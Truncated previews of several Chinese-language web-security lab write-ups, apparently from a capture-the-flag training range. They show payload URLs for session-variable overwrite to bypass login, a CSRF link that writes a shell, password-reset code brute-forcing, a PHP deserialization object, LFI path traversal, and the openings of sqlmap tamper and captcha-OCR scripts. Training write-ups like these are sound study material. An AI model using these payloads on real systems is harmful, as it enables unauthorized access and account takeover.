1. 可能导致变量覆盖漏洞的函数extract()parse_str()import_request_variables()$$2. 代码审计 修改session的值绕过登录  靶场环境有变动目录abc改为了ahttp://120.203.13.75:8123/a/upload/interface/comment.php?_SESSION[duomi_group_id]=1&amp

1. 漏洞的前提是客户是登录状态  所以先登录一下 密码视频教程中说过  当然也可以弱口令爆破2. 根据教程审计代码  构造链接诱导用户点击  写入shellhttp://120.203.13.75:8123/csrf/uploads/dede/sys_verifies.php?action=getfiles&refiles[0]=123&r

1. 通过抓包找到找回密码程序文件为 Include文件夹中的web_email.php2. 找到代码中额重点 从源码中可以看出验证码是10到10000之间的数字重置密码语句没有做任何用户相关的验证  直接根据邮箱与验证码修改了密码3.  从上面两步就可以想到可以使用枚举验证码的方式来修改掉这个邮箱的密码验证码从10开始枚举到10000update sc_user s

1. 审计代码  审计反序列化的条件并根据条件拼装序列化的对象a:1:{i:0;O:6:"readme":1:{s:6:"source";s:8:"flag.php";}}类名为reademe  source的值为flag.php2. 计算序列化对象的MD5值e2d4f7dcc43ee1db7f69e76303d010

1. 注册个账号2. 随便找个商品  数量输入一个负值  可以测试出程序没有对数量的输入做控制3. 直接提交订单4. 进会员中心  发现余额变多了  拿到flag

1. 学习视频课程了解index.php中存在文件包含漏洞http://120.203.13.75:8123/lfi/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../windows/system.ini2. 按照视频教程中实践 拿到站点上system.ini文件内容  但是怎么拿到靶场的flag呢  还

1. html代码<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html

靶场里由于doufu老师考虑大家没有自己的服务器 所以已经在2.php里写死了flag路径到3.txt了  所以能很简单的拿到flag 虽然我用burp操作了一下 拿到flag 但是还是想熟悉下整个流程在本地从头实验一把：由于没有自己的服务器  这里的地址全用了本地的地址  原理是相同的1.    准备payload  &nbs

1. Tamper代码 tampertest.py#!/usr/bin/env pythonimport osimport refrom lib.core.common import singleTimeWarnMessagefrom lib.core.data import kbfrom&nbsp

1. Python代码#-*- coding:utf-8 -*-import sysimport requestsfrom PIL import Imagefrom PIL import ImageOpsfrom pytesseract import *im